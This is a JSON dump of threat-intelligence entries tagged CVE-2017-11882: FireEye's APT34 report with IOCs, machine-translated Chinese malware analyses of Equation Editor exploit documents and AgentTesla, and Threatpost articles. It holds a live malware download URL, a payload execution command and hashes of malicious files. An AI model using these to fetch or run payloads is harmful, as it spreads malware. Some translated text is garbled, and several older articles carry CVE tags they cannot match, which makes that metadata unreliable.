to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8)** **that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.\n\n \nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882)** **to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group\u2019s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address**\n\n| \n\n**MD5 Hash or Description** \n \n---|--- \n \nCVE-2017-11882 exploit document\n\n| \n\nA0E6933F4E0497269620F44A083B2ED4 \n \nb.txt\n\n| \n\n9267D057C065EA7448ACA1511C6F29C7 \n \nv.txt/v.vbs\n\n| \n\nB2D13A336A3EB7BD27612BE7D4E334DF \n \ndUpdateCheckers.base\n\n| \n\n4A7290A279E6F2329EDD0615178A11FF \n \nhUpdateCheckers.base\n\n| \n\n841CE6475F271F86D0B5188E4F8BC6DB \n \ncUpdateCheckers.bat\n\n| \n\n52CA9A7424B3CC34099AD218623A0979 \n \ndUpdateCheckers.ps1\n\n| \n\nBBDE33F5709CB1452AB941C08ACC775E \n \nhUpdateCheckers.ps1\n\n| \n\n247B2A9FCBA6E9EC29ED818948939702 \n \nGoogleUpdateschecker.vbs\n\n| \n\nC87B0B711F60132235D7440ADD0360B0 \n \nhxxp://mumbai-m[.]site\n\n| \n\nPOWRUNER C2 \n \nhxxp://dns-update[.]club\n\n| \n\nMalware Staging Server \n \nCVE-2017-0199 exploit document\n\n| \n\n63D66D99E46FB93676A4F475A65566D8 \n \n94.23.172.164:80\n\n| \n\nMalware Staging Server \n \ndupdatechecker.doc\n\n| \n\nD85818E82A6E64CA185EDFDDBA2D1B76 \n \ndupdatechecker.exe\n\n| \n\nC9F16F0BE8C77F0170B9B6CE876ED7FB \n \nproxycheker[.]pro\n\n| \n\nC2 \n \n46.105.221.247\n\n| \n\nHas resolved mumbai-m[.]site &amp; hpserver[.]online \n \n148.251.55.110\n\n| \n\nHas resolved mumbai-m[.]site and dns-update[.]club \n \n185.15.247.147\n\n| \n\nHas resolved dns-update[.]club \n \n145.239.33.100\n\n| \n\nHas resolved dns-update[.]club \n \n82.102.14.219\n\n| \n\nHas resolved ns2.dns-update[.]club &amp; hpserver[.]online &amp; anyportals[.]com \n \nv7-hpserver.online.hta\n\n| \n\nE6AC6F18256C4DDE5BF06A9191562F82 \n \ndUpdateCheckers.base\n\n| \n\n3C63BFF9EC0A340E0727E5683466F435 \n \nhUpdateCheckers.base\n\n| \n\nEEB0FF0D8841C2EBE643FE328B6D9EF5 \n \ncUpdateCheckers.bat\n\n| \n\nFB464C365B94B03826E67EABE4BF9165 \n \ndUpdateCheckers.ps1\n\n| \n\n635ED85BFCAAB7208A8B5C730D3D0A8C \n \nhUpdateCheckers.ps1\n\n| \n\n13B338C47C52DE3ED0B68E1CB7876AD2 \n \ngoogleupdateschecker.vbs\n\n| \n\nDBFEA6154D4F9D7209C1875B2D5D70D5 \n \nhpserver[.]online\n\n| \n\nC2 \n \nv7-anyportals.hta\n\n| \n\nEAF3448808481FB1FDBB675BC5EA24DE \n \ndUpdateCheckers.base\n\n| \n\n42449DD79EA7D2B5B6482B6F0D493498 \n \nhUpdateCheckers.base\n\n| \n\nA3FCB4D23C3153DD42AC124B112F1BAE \n \ndUpdateCheckers.ps1\n\n| \n\nEE1C482C41738AAA5964730DCBAB5DFF \n \nhUpdateCheckers.ps1\n\n| \n\nE516C3A3247AF2F2323291A670086A8F \n \nanyportals[.]com\n\n| \n\nC2\n", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T18:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "edition": 1, "modified": "2018-12-02T00:00:00", "published": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-28T03:24:00", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Background overview \nAgentTesla was originally a released in 2014 the simple key loggers, and in recent years its development team which constantly adds many new features, and sale. AgentTesla has now become a commercial spyware that can be controlled by the end of the generation to meet the functional requirements of a Trojan. \nAgentTesla the most common mode of transmission is phishing mail, mail attachments often carry a malicious document, by a macro or an exploit to download and run a malicious program. Recently, Sangfor security team collected to make use of CVE-2017-11882 spread AgentTesla steal the information of the malicious samples, and its attack process carried out a detailed analysis. \nA detailed analysis of the \nCVE-2017-11882 \n1. Use tools to monitor file behavior, see to run the document after the system pulled up the eqnedt32. exe process, and by the capture capture to download the EXE file of the flow, whereby the determination is the use of CVE-2017-11882 execute malicious code: a \n! [](/Article/UploadPic/2019-5/201952872350787. png) \n2. By attaching a debugger, the in Kernel32! WinExec next breakpoint, view register values, find the run.\"C:\\Users\\root\\AppData\\Roaming\\Adobe.exe\"the command, and capture the flow of information combined with the judgment, the malicious code should is download save the file to local and then run inference using the URLDownloadToFile related API: \n! [](/Article/UploadPic/2019-5/201952872351853. png) \n3. Attach the debugger to the network related APIS of the lower-off debugging, but the program did not break down, so in the eqnedt32. exe caused an overflow of the function at the lower off, stepping to the ret overwrite the return address to execute malicious code: a \n! [](/Article/UploadPic/2019-5/201952872353745. png) \n4. Malicious code in the first memory to decrypt the operation, the figure is a decryption of a before and after comparison, you can visually see the string information through a dynamic access to the API address to call URLDownloadToFileW download the file, and then through WinExec to run: \n! [](/Article/UploadPic/2019-5/201952872354449. png) \n! [](/Article/UploadPic/2019-5/201952872356708. png) \nAgentTesla \n1\\. AgentTesla is used. Net framework to write a keyboard logger, use the decompile tool to view the code, custom function names are confusing, but the use of the API and the keyword string is still plain text, you can see the keystroke recording code: \n! [](/Article/UploadPic/2019-5/201952872358476. png) \n2. In addition to the Keylogger, it also will by reading the registry key value to obtain the host information: \n! [](/Article/UploadPic/2019-5/201952872359416. png) \n3. Use the DES algorithm to encrypt the data to be sent to: \n! [](/Article/UploadPic/2019-5/20195287240111. png) \n4. There are three alternative ways the stolen data is uploaded to the remote C&amp;C end: \nVia FTP upload: \n! [](/Article/UploadPic/2019-5/20195287241828. png) \nVia SMTP upload: \n! [](/Article/UploadPic/2019-5/20195287242974. png) \nBy HTTP upload: \n! [](/Article/UploadPic/2019-5/20195287243766. png) \n5\\. AgentTesla the resources embedded in a DLL file \u540d\u4e3aIELibrary.dll that is used to implement a browser operation of the DLL file, in AgentTesla defines the need to steal information browser and network kit name, this is in the use of the control terminal generates malicious programs optional: \n! [](/Article/UploadPic/2019-5/20195287244718. png) \n6\\. IELibrary. dll is mainly for the browser for information collection and operation, including the history of additions and deletions to check: \n! [](/Article/UploadPic/2019-5/20195287244281. png) \nSteal passwords and cookies: \n! [](/Article/UploadPic/2019-5/20195287245577. png) \nSolutions \nVirus defense \n1, not from unknown website to download the software, do not click on unknown sources of e-mail attachments, involuntary macro-enabled; and \n2, download patch patch CVE-2017-11882: the \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 \n3, open the Windows Update features regularly to the system for automatic updates; \n4, the Sangfor firewall customers recommended to upgrade to AF805 version, and turn on the artificial intelligence engine to Save, in order to achieve the best defense results; \nFinally, the recommendations of the enterprise on the whole network once the security check and antivirus scan, to strengthen the protection work. \n\n", "edition": 1, "modified": "2019-05-28T00:00:00", "published": "2019-05-28T00:00:00", "id": "MYHACK58:62201994299", "href": "http://www.myhack58.com/Article/html/3/62/2019/94299.htm", "title": "Wary of the use of the Office vulnerabilities to spread commercial spyware AgentTesla-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2020-04-10T12:12:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "The well-known LokiBot malware has popped up in several malicious spam campaigns [over the past year](<https://threatpost.com/threatlist-ransomware-eks-and-trojans-lead-the-way-in-q3-malware-trends/138433/>), covertly siphoning information from victims\u2019 compromised endpoints. Researchers this week are warning of the most recent sighting of the malware, which was recently spotted in spam messages targeting a large U.S. manufacturing company.\n\nResearchers first discovered the campaign on Aug. 21 after an unnamed U.S. semiconductor distributor received a spam email sent to the sales department from a potentially compromised \u201ctrusted\u201d sender. The email, purporting to be distributing an attached request for quotation, was actually harboring prolific trojan LokiBot. \n[](<https://threatpost.com/newsletter-sign/>)\u201cThe attack is pretty straightforward,\u201d said Fortinet researchers in a [Tuesday analysis of the attack](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html>). \u201cThe LokiBot sample has a file size of 286 KB and was recently compiled on Aug 21, which is coincidentally the same date as when the malicious spam was sent\u2026. The spam email then encourages the user to open the attachment as the senders\u2019 colleague is currently out of office, and at the same time offers the potential victim some assurance that he/she can provide further clarification of the contents within the document if needed.\u201d\n\n## Red Flags\n\nDespite the spam email (titled \u201cUrgent Request for Quotation #RFQE67Y54\u201d) coming from a trusted sender, there were several tell-tale signs that might give away the email as malicious.\n\nWhile the email is \u201csimple in appearance,\u201d it contained language that appears to be written by a non-native English speaker and contained spelling errors. For instance, the email states, \u201cPlease see \u2018attache'\u201d, when referring to an \u201cRFQ\u201d (or a \u201crequest for quotation\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10083714/lokibot-malspam.png>)\n\nAnother giveaway is that a closer look at the attached file\u2019s information shows it to be curiously named \u201cDora Explorer Games,\u201d which is in reference to the children\u2019s\u2019 TV heroine from the show \u201cDora The Explorer\u201d \u2013 a strange name for a file that purports to be related to manufacturing.\n\n\u201cWe don\u2019t know if this file info was put in there as a distraction or for reasons unknown to us, as it doesn\u2019t make sense to have such a file name targeting a military and government-based contractor,\u201d researchers said.\n\nOnce opened, the file actually harbors LokiBot malware, which is known for stealing a variety of credentials, including FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials.\n\n## LokiBot Malware\n\nThe malware is known for being simple and effective and for its adoption of diverse attachment types. The malware is a commodity in underground markets, with versions selling for as little as $300.\n\n\u201cLokiBot is distributed in various forms, and has been seen in the past being distributed in zipped files along with malicious macros in Microsoft Word and Excel, or leveraging the exploit CVE-2017-11882 (Office Equation Editor) via malicious RTF files,\u201d said researchers.\n\nLokiBot is also known to be distributed in sneaky ways, including steganography. Several recent attacks in fact showed the malware [disguised as a .zipx attachment](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) hidden inside a .PNG file that can slip past some email security gateways, or hidden as an [ISO disk image file attachment](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>).\n\nHowever, in the most recent campaign \u201cthis particular sample did not use any steganography as past variants were seen doing,\u201d researchers said.\n\n## Connected Spam Campaign\n\nUpon closer investigation, researchers were able to draw loose links between the campaign and a previous spam attack through the IP address.\n\nThe IP address of this attack is registered to a webhosting provider in Phoenix, Ariz. (called LeaseWeb USA), which was previously used twice before in malicious spam attacks that occurred in June.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10094115/image_753132854.img_.png>)\n\nRelated June malspam campaign\n\nThese earlier attacks targeted a large German Bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice. However, there were key differences between the two spam emails, including language (the previous email was in Chinese).\n\n\u201cBecause of the low volume identified, it appears that this IP address may be under the control of one group, and possibly only being used for very targeted attacks,\u201d researchers said. \u201cHowever, we can only assume this \u2013 time will provide a better historical snapshot of campaigns using this IP address.\u201d\n\nTo protect against similar future campaigns, researchers urged organizations to both adopt mail solutions as well as train their employees to look out for spearphishing attempts.\n\n\u201cSince it has been reported that this threat has been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization are made aware of various types of attacks delivered via social engineering,\u201d researchers said. \u201cThis can be accomplished through regularly-occurring training sessions and impromptu tests using predetermined templates by internal security departments within an organization.\u201d\n", "modified": "2019-09-10T14:07:03", "published": "2019-09-10T14:07:03", "id": "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "href": "https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/", "type": "threatpost", "title": "U.S. Manufacturer Most Recent Target of LokiBot Malspam Campaign", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:58", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad them into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. \n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "modified": "2013-04-17T16:31:18", "published": "2012-11-01T15:32:54", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serous enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "modified": "2015-06-25T21:13:37", "published": "2015-06-22T15:11:28", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique is use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses 